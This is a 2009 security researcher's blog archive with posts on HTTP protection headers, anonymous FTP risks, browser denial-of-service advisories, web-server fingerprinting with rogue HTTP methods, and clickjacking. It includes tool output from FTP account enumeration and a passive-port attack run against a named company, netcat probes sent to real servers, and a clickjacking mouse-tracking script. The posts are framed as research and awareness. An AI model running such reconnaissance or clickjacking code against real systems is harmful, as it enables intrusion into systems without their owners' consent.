Security at Stake

Me-Myself-I

Search

Projects-

Email Contacts.

Linkedin Network..

Previous Posts

IS Research Author

Conferences.

EuSecWest
Troopers
XFocus Xcon
Xfocus XKungfoo
Owasp
Clubhack
CERT-IN

Archives

Links

HTTP X Protection Headers - Microsoft Google Stringency

Recently I was reading news headline at security-focus http://www.securityfocus.com/news/11565 about the flaw in Microsoft XSS filter implementation and Google's view over it. We have conducted extensive research on this part in understanding the limitations of the design filter and all. The point to think over this part is even Google has taken some steps to leverage this functionality and considering it as a negative process. Things are quite repulsive looking at the ongoing scenario.

The terminology states that HTTP has X Factor protection considering the protection parameters implemented at the HTTP base level. Steps are taken to improve the functionality by inculcating the HTTP headers and applying it at the real time environment.

Looking at this scenario , I triggered my emulator with perl as base to write some lines of code to check the GWS server by Google at port 80.

[Google Check]

C:\Perl\bin>perl http_X_enum.pl google.com

(*) http_X_enum.pl - HTTP[X] protection enumerator
(*) enumerates (clickjacking,mime sniffing,xss protection, content download , csp etc) applied defense.
(*) web application security assessment script
(*) written by 0kn0ck [at] secniche.org

(*) checking the state of server through icmp requests.
(*) google.com is subjected to be alive

Server: gws

[+] ++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] checking for applied defense on domain : google.com
[+] ++++++++++++++++++++++++++++++++++++++++++++++++++++

[+] detected possible [X-XSS-Protection: 0 ] xss protection parameter : X-XSS-Protection: 0

[-] http parameter [X-XSS-Protection: 1] defense is not applied at domain.
[-] http parameter [X-FRAME-OPTIONS: DENY] clickjacking defense is not applied
[-] http parameter [X-FRAME-OPTIONS: SAMEORIGIN] clickjacking defense is not applied
[-] http parameter [X-CONTENT-TYPE-OPTIONS: NOSNIFF] mime handling-sniffing opt out is not applied
[-] http parameter [X-DOWNLOAD-OPTIONS: NOOPEN ] mime handling- download force save is not applied
[-] http parameter [X-CONTENT-SECURITY-POLICY: ALLOW SELF] content policy is not applied.
[-] http parameter [X-CONTENT-SECURITY-POLICY: ALLOW https://self] content policy is not applied.
[-] http parameter [ACCESS-CONTROL-ALLOW-ORIGIN] csrf origin access is not applied.

=================[DEBUG]=============================

HTTP/1.1 301 Moved Permanently
Location: http://www.google.com/
Content-Type: text/html; charset=UTF-8
Date: Wed, 25 Nov 2009 02:38:09 GMT
Expires: Fri, 25 Dec 2009 02:38:09 GMT
Cache-Control: public, max-age=2592000
Server: gws
Content-Length: 219
X-XSS-Protection: 0


=================[DEBUG]=====================
[+] execution success.


Lets; see Yahoo

C:\Perl\bin>perl http_X_enum.pl yahoo.com

(*) http_X_enum.pl - HTTP[X] protection enumerator
(*) enumerates (clickjacking,mime sniffing,xss protection, content download , csp etc) applied defense.
(*) web application security assessment script
(*) written by 0kn0ck [at] secniche.org

(*) checking the state of server through icmp requests.
(*) yahoo.com is subjected to be alive


[+] +++++++++++++++++++++++++++++++++++++++++++++++++++
[+] checking for applied defense on domain : yahoo.com
[+] +++++++++++++++++++++++++++++++++++++++++++++++++++

[-] http parameter [X-XSS-Protection: 0] not detected.
[-] http parameter [X-XSS-Protection: 1] defense is not applied at domain.
[-] http parameter [X-FRAME-OPTIONS: DENY] clickjacking defense is not applied
[-] http parameter [X-FRAME-OPTIONS: SAMEORIGIN] clickjacking defense is not applied
[-] http parameter [X-CONTENT-TYPE-OPTIONS: NOSNIFF] mime handling-sniffing opt out is not applied
[-] http parameter [X-DOWNLOAD-OPTIONS: NOOPEN ] mime handling- download force save is not applied
[-] http parameter [X-CONTENT-SECURITY-POLICY: ALLOW SELF] content policy is not applied.
[-] http parameter [X-CONTENT-SECURITY-POLICY: ALLOW https://self] content policy is not applied.
[-] http parameter [ACCESS-CONTROL-ALLOW-ORIGIN] csrf origin access is not applied.

=====================[DEBUG]=====================

HTTP/1.1 301 Moved Permanently
Date: Wed, 25 Nov 2009 02:42:40 GMT
Location: http://www.yahoo.com/
Cache-Control: private
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8

95 The document has moved here.
0

==================[DEBUG]======================

[+] execution success.

The script posed the appropriate results looking at the two different domains. But one thing is sure that Google is not at all in coherence with Microsoft steps.

Posted on 11/24/2009 06:25:00 PM by 0kn0ck | 0 Comments

Hakin9 - Extended Edition (Best Of) Featured Papers

Hakin9 has released an extended edition which features the some of the best articles that are chosen by the readers and the team itself. Two articles have been placed in it:

1. Auditing Oracle in Production Environment
2. Reverse Engineering Binaries

You can look some of the papers at:

http://hakin9.org/magazine/article

Enjoy !

Posted on 9/28/2009 09:25:00 AM by 0kn0ck | 0 Comments

Infosecurity Article : "Ethical Hacking in Business World"

InfoSecurity has published a new article on the on going industry trends of ethical hacking and its differential behavior in business world.

This article reflects a thoughtful process of ongoing security practices and business dependency considering the feasibility of core technology. The security jargon is stemming up with a high pace compromising all the barriers. The business sphere is getting increasingly dependent on the automation processes. All the monetary transactions and high end functionality is based on computers. But the positive side is always accompanied with the negative side too.

For more visit

http://fanaticmedia.com/infosecurity/archive/Sep09/Ethical%20Hacking.htm

Posted on 9/19/2009 10:41:00 AM by 0kn0ck | 0 Comments

Vendor Firms and Anonymous Services - Risk or Business Criticality


The security is termed to be as a closed asset for any organization. It has been noticed in recent times that many of the business vendor allows certain anonymous access to the services running on their server. The concern of this post is not restricted to one part but looking at the diversified impact. Apparently the issue seems small but the resultant impact is high. Anything with a default or anonymous access is potentially critical. For example:- the most common issue is FTP open access. Many of the organizations allow anonymous access without understanding the consequences that may hamper the normal functioning.

There are certain facts:

1. A vendor has to restrict the open services.
2. A vendor has to provide a standard access to the clients even for the simple download. Now days, it is not considered as an appropriate solution for providing open access to services. Even for the business perspective restricted access should be taken into consideration. Why open FTP? Why not a credential based access?
3. If the services has to be given then scrutinize the deployment strategy whether it has to be applied at internet or intranet.
4. Why not to put these services on VPN considering the business need.
5. The configuration against these deployed services. Why not to use the organization specific policy based password for FTP access. Why anonymous?
6. Open services are tactically exploited to gain information and reconnaissance.
7. These can be used to scan third party targets too.

Question: Is Security a Prime Target or Business?
Answer: Individualistic and Organizational Decision. Diversified impacts.

Let's consider a case and a risk emanating from it. For example - an organization is providing an open access to FTP services. We will be considering specific functions from security point of view:

1. Passive Mode
2. Glob() Global

"Most FTP daemon implementations provide server-side globbing functionality that performs pattern expansion on these pathnames. The actual glob() implementation is often located in the FTP daemon itself,though some FTP servers use an underlying libc implementation."

"glob - Toggle file name globbing. When file name globbing is enabled, ftp expands csh(1) metacharacters in file and directory names. These characters are *, ?, [, ], ~, {, and }. The server host expands remote file and directory names. Globbing metacharacters are always expanded for the ls and dir commands. If globbing is enabled, metacharacters are also expanded for the multiple-file commands mdelete, mdir, mget, mls, and mput."

If an FTP server provides anonymous access with a passive mode on are more vulnerable
toFTP Bounce Attacks.

Glob() function can be tested against number of buffer overflow issues. The ability of a remote or local user to deliver input patterns to glob() implementations allows
risk of exploitation once the vulnerability is exploited.

Let;s have a look at the real world scenario : Analysis of uptime software. A complete thought oriented and for knowledge purposes.

Administrator@TopGun ~
$ ftp uptimesoftware.com
Connected to uptimesoftware.com.
220 uptime software FTP services
Name (uptimesoftware.com:Administrator): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> passive
Passive mode on.
ftp> debug
Debugging on (debug=1).
ftp> glob
Globbing off.
ftp> glob on
Globbing on.

ftp> dir
---> PASV
227 Entering Passive Mode (216,220,63,213,73,192)
---> LIST
150 Here comes the directory listing.
-rw-rw-r-- 1 501 501 148181 Feb 07 2008 BMO and uptime software.pdf
drwxrwxr-x 2 501 501 4096 Jun 23 19:08 CVS
lrwxrwxrwx 1 501 501 33 Dec 02 2008 ReleaseNotes_up.time5.pdf -> ../pdfs/ReleaseNotes_up.time5.p
df
lrwxrwxrwx 1 501 501 37 Dec 02 2008 ReleaseNotes_up.time5_SP1.pdf -> ../pdfs/ReleaseNotes_up.tim

So its easy to look at the rights configured for different user groups.

Administrator@TopGun /cygdrive/c/scripts
$ perl pasvagg.pl uptimesoftware.com
:: connected to uptimesoftware.com
>> 220 uptime software FTP services
:: logging into server as anonymous.
>> 331 Please specify the password.
>> 230 Login successful.
>> 227 Entering Passive Mode (216,220,63,213,89,62)
:: server ready for passive attack
:: sampling passive port selection
:: passive connection rate = 6259.7/sec
:: passive command latency = 0.4 seconds
:: starting the reaper engine

:: starting port 17200

Based on one of my designed script , lets analyze the reaped information
Administrator@TopGun /cygdrive/c/my_tools
$ perl ftp_user_reconnaisance.pl uptimesoftware.com
ftp_user_reconnaisance.pl - ftp based system user reconnaisance
written by- 0kn0ck [at] secniche.org

(*) resolving the generic address for domain: uptimesoftware.com
(!) 216.220.63.213

(*) detecting nameservers for the domain : uptimesoftware.com
(!) ns4-auth.q9.com
(!) ns1-auth.q9.com
(!) ns3-auth.q9.com
(!) ns2-auth.q9.com

(*) trying anonymous access on - uptimesoftware.com
(*) anonymous access allowed - uptimesoftware.com
(*) uptimesoftware.com does not support TLS

(*) trying to enumerate the configured system accounts on - uptimesoftware.com

[conn str - 0] - [temp] is not a standard system configured user
[conn str - 1] - [root] is a standard system configured user
[conn str - 2] - [bin] is a standard system configured user
[conn str - 3] - [daemon] is a standard system configured user
[conn str - 4] - [adm] is a standard system configured user
[conn str - 5] - [lp] is a standard system configured user
[conn str - 6] - [sync] is a standard system configured user
[conn str - 7] - [shutdown] is a standard system configured user
[conn str - 8] - [halt] is a standard system configured user
[conn str - 9] - [mail] is a standard system configured user
[conn str - 10] - [news] is a standard system configured user
[conn str - 11] - [uucp] is a standard system configured user
[conn str - 12] - [operator] is a standard system configured user
[conn str - 13] - [games] is a standard system configured user
[conn str - 14] - [gopher] is not a standard system configured user
[conn str - 16] - [apache] is not a standard system configured user
[conn str - 17] - [named] is not a standard system configured user
[conn str - 18] - [amanda] is not a standard system configured user
[conn str - 19] - [indent] is not a standard system configured user
[conn str - 20] - [rpc] is not a standard system configured user
[conn str - 21] - [wnn] is not a standard system configured user
[conn str - 22] - [xfs] is not a standard system configured user
[conn str - 23] - [pvm] is not a standard system configured user
[conn str - 24] - [ldap] is not a standard system configured user
[conn str - 25] - [mysql] is not a standard system configured user
[conn str - 26] - [rpcuser] is not a standard system configured user
[conn str - 27] - [nsf] is not a standard system configured user
[conn str - 28] - [nobody] is a standard system configured user
[conn str - 29] - [junkbust] is not a standard system configured user
[conn str - 30] - [gdm] is not a standard system configured user
[conn str - 31] - [squid] is not a standard system configured user
[conn str - 32] - [nscd] is not a standard system configured user
[conn str - 33] - [rpm] is not a standard system configured user
[conn str - 34] - [mailman] is not a standard system configured user
[conn str - 35] - [radvd] is not a standard system configured user
(*) command completed successfully


The only point in presenting these facts with an example is to show the risks posed
and the impact on security.

At last : Why not a mature business with hardened security?

Posted on 8/06/2009 11:07:00 AM by 0kn0ck | 0 Comments

Elsevier - CFSJournal - Breaches in Security Vendor Websites


A new article on "Security breaches in vendor websites" have been released in Elsevier's Computer Fraud and Security Journal.

The security business model revolves around security entities and those security service providers that ensure implementation of secured mechanisms in every aspect of deployment. But how mature are those businesses' own security models? We will evaluate various instances of breaches in security companies and how they occur. The world has seen a number of cases like Kaspersky, F-Secure, a reseller for BitDefender, and so on. There are a number of cases that have not been released publicly. Why is this happening, and what is the root cause? More ........

LINK

Regards

Posted on 8/06/2009 10:56:00 AM by 0kn0ck | 0 Comments

Hakin9 Edition - Article and Self Exposure Interview



Hakin9 has published an article on "Hacking through Wild Cards" This paper sheds light on the usage of wild characters that lead to hacking. The wild characters are used effectively in a different sphere. The inappropriate use of wild characters can lead to misconfiguration of parameters thereby resulting in a number of attacks.

In addition to that , An interview has been published in prime "Self Exposure" section.

you can look into the issue at:

http://hakin9.org/prt/view/about-the-mag/issue/1052.html

Regards

Posted on 7/17/2009 11:58:00 PM by 0kn0ck | 1 Comments

SyScan 09 Conference - Wrap Up


SyScan is Asia's one of the prime conference. This year conference has a great set of talks by most good guys in security field. We organized an ICANPWN contest at SyScan this year. There were lot of good content and new discoveries by researchers. Usually we noticed a indispensable research on virtualization. Outspect tool for live memory analysis of virtual machines from host OS. Outbound. Mr. Quynh has created this tool.
In relation to that there was lot of good stuff on PHP,JAVA , CITRIX, BIOS etc. Overall the conference comes out with a great knowledge , thats what it is aim for.

The CTF stuff was cool and organized by White Wolf Security.Thanks to Thomas for organizing such a conference.

If you miss the fun , you can watch some stuff here:

PICS

Regards

Posted on 7/17/2009 11:25:00 PM by 0kn0ck | 0 Comments

Elsevier - Is Your System Pwned

Elsevier has released a new article as "Is your system pwned".

Article Overview:
"What is the relationship between humans, technology, and fraud? They are all linked together in a triangle. Most monetary transactions today are carried out using digital technologies, most frauds are monetary, and all frauds are perpetuated by people. As fraud prevention experts, we try to break the triangle – to ensure that people don’t interact with technology to create fraudulent situations."

Link to Journal

Regards

Posted on 6/11/2009 06:23:00 AM by 0kn0ck | 0 Comments

Gmail/Google Doc PDF Repurposing Integrated Attacks - Cookie Hijacking / Stealing





Google docs network was vulnerable to PDF repurposing attacks. The vulnerability was disclosed to Google with a discretion. This was done to mitigate the risk. Google had worked over it and patched it with in a period of 5 days.

The Google doc has been refined now and the integrated support for adobe plugin is removed. The user security was the prime issue because millions of user were at risk if this attack persisted in the open environment. Integrated accounts were more susceptible as certain stolen credentials could be used to access accounts.

The advisory is released here:
http://secniche.org/gmd_hijack/gc_hijack.xhtml
http://secniche.org/gmd_hijack/advisory_gmail_google_docs_pdf_repurposing_attack.pdf

Regards

Posted on 5/11/2009 07:11:00 AM by 0kn0ck | 0 Comments

Troopers 09 Security Conference

The troopers security conference is the one of the finest conference I have been to. Its very nice to have such conference in the heart of Germany. a great technical content and nice crew to discuss things and hang around :). I gave a talk on "Browser Design Flaws". There were some good talks around rootkits , malware for business purposes and web application firewall stuff. All talks were good and it was a great learning environment. Visit :Troopers09

Personally I liked the Packet Wars Hacking Competition by Bryan. It was nicely organized. You can look at the stuff at : Packet Wars Good hacking games to enjoy.

If you miss the fun you can have a look at the snaps here : Troopers09 fun

Regards

Posted on 5/02/2009 08:23:00 AM by 0kn0ck | 0 Comments

Google Chrome Alert Single Thread Out of Bound Denial of Service Vulnerability


The vulnerability reported to Google is not appropriately understood.There is more discussion required on it. The vulnerability link is provided below:-

http://secniche.org/gcalrt.html

The denial of service condition persists efficiently with the reported version.

When this vulnerability is triggered , following output is undertaken:

1. The browser gets in locked state and becomes unresponsive. The user
can not perform any operation
2. It is not only restricted to single tab but it impacts all the opened windows.
3. Process killing is the only solution left.

This works perfectly fine on Windows XP platform.

Note: The new version of Google Chrome is also Vulnerable.

All views are welcomed for any type of discussion.

Posted on 4/11/2009 01:56:00 AM by 0kn0ck | 0 Comments

Browsers Behavior : Handling Carriage Return "window.open('\r\n\r\n');" JavaScript Calls


The carriage return and null characters are considered to be as a potential elements of testing behavior of various programs. This works efficiently with different browsers too. The resultant output is quite stringent in relation to the normal behavior that must be shown by the browsers. The Carriage Return (CR) encompass Line Feed and New Line characters as a basic part. As per the standard fact

"carriage return character, alone or with a line feed, to signal the end of a line of text, but other characters are also used for this function (see newline); others use it only for a paragraph break (a hard return)"


Based on this fact a number of tests have been conducted on different browsers. These characters are passed as an argument to javascript:window.open() function to notice the behavior of the new window. It can be used as one of the fuzzed input for testing browser dependencies. Based on this artifact one of the Google Chrome advisory was released. The links are mentioned below:

http://www.securityfocus.com/bid/31375

http://www.symantec.com/business/security_response/attacksignatures/detail.jsp?asid=23189

http://osvdb.org/show/osvdb/48680

http://www.secniche.org/gcrds.html

That was the vulnerability noticed in Google Chrome and was patched by the vendor. The behavior that is noticed all the time with different browsers are:-

1. Mozilla Firefox opens bundle of windows in single stretch.
2. Google Chrome open number of windows too.

Note: We are not considering loops here but only carriage return character. some stability has been added because presence of Pop UP blockers stops the execution
of these child windows.

We have noticed this differential responses from number of browsers. I think the CR is good element to be used for fuzzing. The browsers behavior is hard to control considering the issue presented above.

Regards

Posted on 3/31/2009 09:51:00 PM by 0kn0ck | 0 Comments

Internet Explorer 8 - Anti Spoofing is a Myth

With the new features implemented in IE 8, the status address bar has been transformed too. The new step taken by Microsoft IE team that is not to show the address of selected link in a status bar can have a serious impact. A user
will not be able to see the active link in the status bar. This looks like to be an implementation of security solution with an obscurity. Status bar is required for Link Integrity check that assures a user about the legitimate website. We are
not considering the ingrained vulnerabilities of status address bar spoofing in browsers at this point of time.

For more details:- http://secniche.org/ie_spoof_myth/

Regards
0kn0ck

Posted on 3/25/2009 11:39:00 AM by 0kn0ck | 0 Comments

Elsevier - NESE Journal - From Vulnerability to Patch

Elsevier has published a new thought article on "From Vulnerability to Patch" in Network Security Journal.

http://www.elsevierscitech.com/nl/ns/home.asp

As per the standards this Journal is not available freely , you need to subscribe it.

Regards
0kn0ck

Posted on 3/14/2009 06:37:00 AM by 0kn0ck | 0 Comments

Evading Web XSS Filters through Word (Microsoft Office and Open Office) in Enterprise Web Applications


This paper sheds light on the hyper linking issues observed during penetration testing of web based enterprise applications. This concept can be used to bypass standard XSS filters by creating a malicious Microsoft word document.

Download the Paper at : HERE

Regards
0kn0ck

Posted on 3/12/2009 03:36:00 AM by 0kn0ck | 0 Comments

Mapping HTTP Interface Embedded Devices

Hakin9 has published a new paper. This paper discusses the generic approach of detecting the HTTP interface of embedded devices. These devices perform a number of different functions based on the infrastructural need.

Check

Regards
0kn0ck

Posted on 2/28/2009 09:50:00 AM by 0kn0ck | 0 Comments

Informer - Hacking for Charity

Its matter of immense pleasure that researchers all over the world are getting collaborated together for the cause of charity. Be a part of it. Its a very good initiative by Johnny Long. We appreciate his concern and Secniche will be a pure part of it.

This is a sincere request for all talent all around to play your part in it.

About Informer:
"The Informer is a fund raising effort run by Hackers For Charity. It is designed to give subscribers a "backstage pass" to the world of Information Security."

Informer - Why?

Hackers for Charity

Get on the same boat for a great cause.

Regards
0kn0ck

Posted on 2/28/2009 09:35:00 AM by 0kn0ck | 0 Comments

Obfuscated HTTP Method Call based Fingerprinting Analysis

Fingerprinting of web servers can be done in different ways. It has been noticed that the HTTP methods are not interpreted in an appropriate manner by number of web servers. It can be seen while fuzzing web servers ( if the particular HTTP method is included ). With the advent of new scripting languages number of different web servers are in a race. Let's first look at the some of the web servers which are in use now a days. The list is under mentioned:-

[Zope Web Server]Zope is an open source application server for building content management systems, intranets, portals, and custom applications. The Zope community consists of hundreds of companies and thousands of developers all over the world, working on building the platform and Zope applications. Zope is written in Python, a highly-productive, object-oriented scripting language.

[Mongrel Web Server]
Mongrel is a fast HTTP library and server for Ruby that is intended for hosting Ruby
web applications of any kind using plain HTTP rather than FastCGI or SCGI.

[Jetty]
Jetty is an open-source, standards-based, full-featured web server implemented entirely in Java.

These are number of web servers which are used in open source development extensively. The IIS and Apache (different variants)are always on the role.

The point that needs to be scrutinized is the request acceptance by the web server and the ability of open source web servers to understand the HTTP method properly. The IIS and Apache are efficient in handling rogue requests. But other web servers fail to instantiate this kind of behavior( interpreting HTTP requests efficiently].

This talk serves over two basic principles:

1. Effectiveness and Pervasiveness of Web servers in interpreting the HTTP Call Method.
2. Type of response send by the server.
3. The type of exceptions occur.

There are number of tools that fingerprint web servers. There is no doubt that 70% of web servers deployed globally can be traced by fetching banners. But our aim is to perform fingerprinting with minimum information. That's where fuzzing becomes really critical. We have critically examined the behavior of under mentioned entities and their collective use to fingerprint web servers.

1. Rogue HTTP Method Call Invocation.
2. Long String of /\/\/\/\/\/\/\/\ Expression.

We have used back slash character. According to regular expression and pattern matching theory the backslash character can be used for following purposes.

1) stand for itself,
2) quote the next character,
3) introduce an operator,
4) do nothing.

It depends a lot in the context in which backslash character is used. We will see the behavior of number of web servers when a specific request is sent.

$ nc www.example.com 80
JAG /\/\/\/\/\/\/\/\/\ HTTP/1.0

HTTP/1.1 404 Not Found
Date: Tue, 24 Feb 2009 13:48:37 GMT
Server: Mongrel 1.1.3
Status: 404 Not Found
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 708
Set-Cookie: _session_id=5537174372e814e02fee588aa67c4a2a; path=/
Connection: close


It responds with HTTP/1.1 specification and 404 (The server has not found anything matching the URI given )Not Found. That's right. Another point that should not be neglected in Mongrel web servers is that it adds a Status parameter in a response. This behavior is only shown by the Mongrel web server. On the contrary the server does not point out the HTTP method used for call invocation.

$ nc example.org 80
JAG /\/\/\/\/\/\/\/\ HTTP/1.0

HTTP/1.1 405 Method Not Allowed
Date: Tue, 24 Feb 2009 13:53:29 GMT
Server: Jetty/5.1.14 (SunOS/5.10 x86 java/1.6.0_03
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: xn_visitor=4537fb13-e021-4cdb-bb50-4e3a8bfbb6fa;Path=/;Domain=.z1014
ba.ningops.com;Expires=Fri, 22-Feb-19 13:53:29 GMT
X-XN-Trace-Token: 8702916f-3dbd-4d51-978c-06abbe2adf73
Allow: GET, HEAD, POST, PUT, DELETE, MOVE, OPTIONS, TRACE
Content-Type: text/html
Content-Length: 1246
Connection: close


The Jetty web server responds back 405 (the client has tried to use a request method that the server does not allow.The method specified in the Request-Line is not allowed for the resource identified by the Request-URI. The response MUST include an Allow header containing a list of valid methods for the requested resource). As Jetty is written in Java the HTTP methods are always configured most of the time which are allowed to be executed.

For Zope server we will consider two cases as structured below.

$ nc example.com 80
JAG /\ HTTP/1.0

HTTP/1.1 200 OK
Date: Tue, 24 Feb 2009 14:11:37 GMT
Server: Zope/(Zope 2.9.6-final, python 2.4.4, linux2) ZServer/1.1 Plone/2.5.1
Content-Length: 59
Content-Type: text/plain; charset=iso-8859-15
Via: 1.0 www.example.com
Connection: close
webdav.NullResource.NullResource object at 0x2aaaacda0b18


The server responds back with 200(the request is fulfilled) OK response code. There is an null pointer exception too at the end. Let's look at the different layout

$ nc example.org 80
JAG /\/\/\/\/\/\ HTTP/1.0

HTTP/1.1 404 Not Found
Date: Tue, 24 Feb 2009 14:03:42 GMT
Server: Zope/(Zope 2.9.6-final, python 2.4.4, linux2) ZServer/1.1 Plone/2.5.1
Bobo-Exception-Line: 66
Content-Length: 1403
Bobo-Exception-Value: See the server error log for details
Bobo-Exception-File: NullResource.py
Bobo-Exception-Type: NotFound
Content-Type: text/html; charset=iso-8859-15
Via: 1.0 www.example.com
Connection: close


We are not considering the exceptions here. You can see the server responds back with 404(This status code is commonly used when the server does not wish to reveal exactly why the request has been refused, or when no other response is applicable.)
The response is different with string manipulation. The ambiguity is there or the code does not handle the request effectively.

Let's try this behavior for Microsoft IIS and Apache

$ nc microsoft.com 80
JAG /\/\/\/\/\/\/\ HTTP/1.0


HTTP/1.1 501 Not Implemented
Content-Length: 0
Server: Microsoft-IIS/6.0
P3P: CP='ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo C
NT COM INT NAV ONL PHY PRE PUR UNI'
X-Powered-By: ASP.NET
X-UA-Compatible: IE=EmulateIE7
Date: Tue, 24 Feb 2009 14:06:06 GMT
Connection: close

The response code is 501(The server does not support the functionality required to fulfill the request. This is the appropriate response when the server does not recognize the request method and is not capable of supporting it for any resource). It is quite perfect as per the desired logic.

$ nc apache.org 80
JAG /\/\/\/\/\/\ HTTP/1.0

HTTP/1.1 501 Method Not Implemented
Date: Tue, 24 Feb 2009 14:50:58 GMT
Server: Apache/2.2.9 (Unix)
Allow: GET,HEAD,POST,OPTIONS,TRACE
Vary: Accept-Encoding
Content-Length: 337
Connection: close
Content-Type: text/html; charset=iso-8859-1


The same result is returned by Apache as 501. The differential pattern is under mentioned as:

IIS Server Response String -- HTTP/1.1 501 Not Implemented
Apache Server Response String -- HTTP/1.1 501 Method Not Implemented

The word "method" is not present in the IIS response. This is a generic behavior.

The most widely used web servers track down the HTTP method invocation check which is quite missing in other web servers. Two points arise:-

1. Do web server implements a check on HTTP Method Call Invocation?
2. Are web servers processing request based on URI only ?

This all depends on the web server development. Lets try this logic on proxies:

$ nc example.org 80
JAG /\/\/\/\/\/\ HTTP/1.0

HTTP/1.0 400 Bad Request
Server: squid/2.7.STABLE6
Date: Tue, 24 Feb 2009 14:00:52 GMT
Content-Type: text/html
Content-Length: 1207
X-Squid-Error: ERR_INVALID_REQ 0
X-Cache: MISS from cache5.zmh.zope.net
Via: 1.0 cache5.zmh.zope.net:8300 (squid/2.7.STABLE6)
Connection: close

The proxy server responds back with 400 Bad Request with same HTTP/1.0. The proxy
intercepts and scrutinize the HTTP method and URI request at the perimeter level.

The behavior is again different if compared to web servers. This analysis lay stress on the HTTP Method call check which is required to prune down the fingerprinting process based on this factor.

If all web servers responds back with 501 code then it should be consider as a unanimous behavior among different web browsers.

Regards
0kn0ck

Posted on 2/24/2009 05:23:00 AM by 0kn0ck | 0 Comments

More Towards Clickjacking - Simulating Positive Trends



Clickjacking. You will find number of definitions about this attack. In generalized manner it is a kind of attack that simulate not only MOUSE EVENTS, while performing malicious operations but also hijacking of user interface components that are displayed by a specific site.

Usually, the aim is to trap the handling of hidden events, when a mouse is clicked over the user interface component such as buttons.I am considering all types of web based variants that can be triggered through browsers. The point of dissemination about clickjacking is to scrutinize the behavior of user interfaces(buttons). The events can be generated dynamically or manually. When an user interface is clicked , a hidden event is executed at the back.

A recent simple POC which was released based on this concept. The proof of concept revolves around the activation of a code (div) through a generic mouse event that binds to hidden structure with div tags. We are not actually sticking to general JavaScript call i.e. location.href. It is used as a one part but what is more interesting, is the pure use of hidden event through mouse clicking, which triggers it. The proof of concept clearly defines that. The clickjacking POC is a very simple variant to just show the browser request handling. More devastated actions can be performed where user authentication is required.

Well it is quite view specific here. The major trend revolves around:

1. Execution of hidden frames by triggering mouse interface with components(buttons).
2. Mouse coordinates play even a critical role to match the positions.

The coordinates function:

function clickjack_armor(evt)
{
clickjack_mouseX=evt.pageX?evt.pageX:evt.clientX;
clickjack_mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=clickjack_mouseX-1;
document.getElementById('mydiv').style.top=clickjack_mouseY-1;
}

When we are talking about hidden, we use DIV tags or other manually drafted codes to generate hidden frames.

3. The victims has to be trapped..

If we consider this definition of clickacking
"A clickjacked page tricks a user into performing undesired actions by clicking on a concealed link. On a clickjacked page, the attackers show a set of dummy buttons, then load another page over it in a transparent layer. The user thinks he is clicking the visible buttons, while he/she is actually performing actions on the hidden page"

Clickjacking is based on a similar principle: to convince the end user to provide information that does not seem to have any value to the user, but factually has power over the user's assets or ID, if applied in a particular context.

Again I think real issue behind clickjacking have been clearly on the cards.I sincerely feel that the SecTheory has given a clear explanation here:ClickJacking Paper.

Rest its a browser issue and the events can be triggered in a number of ways. Browser interaction with users always at the verge of exploitation. So this is a threat and we have to collaborate in working against it.

Security is a prime motive so lets drive by it.

Cheers

Posted on 2/01/2009 04:32:00 AM by 0kn0ck | 0 Comments

BCS Article - Scrutinizing Business Logic

The British Computer Society has published a new article on business logic written by secniche. The article revolves around:

The vulnerability pattern is shifting more towards application level and attackers are concentrating more on exploiting web applications rather system level insecurities. The high end attacks used to start with XSS and SQL injections, but the paradigm has shifted more towards business logic flaws.

For detailed article:

http://www.bcs.org/server.php?show=ConWebDoc.24009&changeNav=8265

Regards
0kn0ck

Posted on 1/22/2009 01:13:00 AM by 0kn0ck | 0 Comments